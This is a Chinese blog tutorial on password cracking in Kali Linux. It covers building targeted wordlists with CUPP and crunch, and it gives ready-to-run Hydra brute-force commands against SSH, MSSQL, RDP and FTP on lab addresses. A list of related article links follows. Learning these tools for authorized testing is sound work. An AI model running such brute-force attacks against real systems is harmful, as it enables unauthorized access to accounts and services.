口令破解：

易破解的口令如下：

弱口令：比如12345、00000这种简单的密码
默认口令：服务或者软件自动生成的口令：比如PHPstudy中自动生成MySQL密码为root。
明文传输：HTTP、FTP、Telnet等传输协议。

暴力破解：

在线破解：破解过程中账户需要验证
离线破解：密文还原成明文的过程。

字典生成工具

字典：

弱口令字典：
社工字典：

社工字典cupp：

安装：apt-get install cupp
使用方法 cupp -i即可按照提示步骤生成字典：

之后就会生成成功

这是它的提示：
-i 是按照提示步骤实施
-w 是引入字典
-l 是下载网上字典
-a 是来自数据库直接解析密码

弱口令字典：crunch

kali自带，无需安装。
详细内容见 man crunch

使用方法：crunch <min> <max> [<charset string>] [options]：min和max分别是密码的最小长度和最大长度，后面可以加上字符集和其他选项。
比如crunch 1 8 ：输出a~zzzzzzzz所有可能的密码

参数;

-b 指定文件输出的大小，避免字典文件过大
-c 指定文件输出的行数，记包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符，即到该字符串就停止生成
-f 调用库文件（/usr/share/crunch/charset.lst）
-i 改变输出格式，即aaa,aab -> aaa,baa
-o 将密码保存到指定文件
-q 读取密码文件，即读取pass.txt
-r 定义重复一个字符串就重新开始
-s 指定一个开始的字符
-t 指定密码输出的格式
-u 禁止打印百分比
-z 压缩生成的字典文件，支持gzip,bzip2,lzma,7z
-l 生成特殊字符
-p 指定生成元素

特殊字符
%代表数字
^代表特殊符号
@代表小写字母
,代表大写字母

样例，来源于man crunch

crunch 1 6 abcdefg
crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
crunch 1 6 abcdefg
there is a space at the end of the character string. In order for crunch to use the space you will need to escape it using the \ character. In this example you could also put quotes around the letters and not need the , i.e. "abcdefg ". Crunch will display a wordlist using the character set abcdefg that starts at a and ends at (6 spaces)：从a到6个空格结束
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
crunch will use the mixalpha-numeric-all-space character set from charset.lst and will write the wordlist to a file named wordlist.txt. The file will start with a and end with " "
crunch 4 5 -p abc
The numbers aren’t processed but are needed.crunch will generate abc, acb, bac, bca, cab, cba.
等等

口令破解工具hydra

-l 指定一个用户名
-p指定一个密码
-P指定密码字典
-L 指定用户名字典
-vV显示爆破细节
-o保存爆破结果
-f找到正确密码就停止爆破
-e n(null)、s(same)、r(反向)
-e nsr
-t 线程

实例：

破解ssh：hydra -l zeker62 -P pwd.dic 192.168.223.133 ssh -vV -f -e nsr

结果,破解成功：

据说这个九头蛇啥都可以破解：
参考资料：https://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

破解MSSQL 口令
hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV

破解RDP 口令
hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV

破解FTP 口令
hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.168.1.150 ftp -vV

口令破解：kali字典工具的使用：CUPP、Crunch、Hydra相关推荐

【网络与系统安全实验】口令破解及防御
[网络与系统安全实验]口令破解及防御口令的历史与现状 20世纪80年代,当计算机开始在公司里广泛应用时,人们很快就意识到需要保护计算机中的信息.仅用userID标识自己,很容易被其他人得到,出于这个 ...
口令破解工具L0phtCrack的使用
口令破解工具L0phtCrack的使用有关系统用户账号密码口令的破解主要是基于密码匹配的破解方法, 最基本的方法有两个,即穷举法和字典法. 穷举法就是效率最低的办法,将字符或数字按照穷举的规则生成口 ...
学习使用口令破解工具：hashcat、LC、SamInside
在学习使用口令破解工具之前,我们要先创建一个用户账号,原理是利用其哈希值进行破解. 很关键的一点是,要在虚拟机里面创建用户!!! 很关键的一点是,要在虚拟机里面创建用户!!! 很关键的一点是,要在虚拟 ...
Kali Linux 系统暴力破解压缩包密码工具总结
在 Kali Linux 系统中,有多种工具可以用于暴力破解压缩包密码.下面将介绍几种常用的工具,包括 fcrackzip.zipcracker 和 John the Ripper. 1.fcrack ...
口令破解（web安全入门07）
一.口令破解 1.1 口令安全概述现在很多地方以用户名(账户)和口令(密码)作为鉴权的方式,口令(密码)就意味着访问权限.例如网站后台.数据库.服务器.个人电脑.QQ.邮箱等等. 1.2 口令安全 ...
【CyberSecurityLearning 54】扫描技术+口令破解
目录扫描技术资产发现扫描神器(nmap)[效率高] 主机发现端口扫描扫描方式参数 Nmap命令 nmap扫描时的端口状态工具扫描技术---网络漏洞扫描漏洞扫描原理漏洞扫描通常分为两 ...
弱口令总结和爆破工具
弱口令总结和爆破工具弱口令定义网站管理.运营人员由于安全意识不足,为了方便.避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等. 攻击者利用此漏洞可直接进入应用系统或者管理 ...
20155220吴思其实验2 Windows口令破解
实验目的: 了解Windows口令破解原理对信息安全有直观感性认识能够运用工具实现口令破解实验人数每组一人系统环境 windows 实验工具 LC5 SuperDic 实验原理口令破解方法 ...
20155207实验2 Windows口令破解
20155207实验2 Windows口令破解实验目的了解Windows口令破解原理对信息安全有直观感性认识能够运用工具实现口令破解实验原理口令破解方法口令破解主要有两种方法:字典破解和 ...
# 2017-2018-1 20155336《信息安全技术》实验二——Windows口令破解
2017-2018-1 20155336<信息安全技术>实验二--Windows口令破解实验原理口令破解方法口令破解主要有两种方法:字典破解和暴力破解. 字典破解是指通过破解者对管理 ...

口令破解：kali字典工具的使用：CUPP、Crunch、Hydra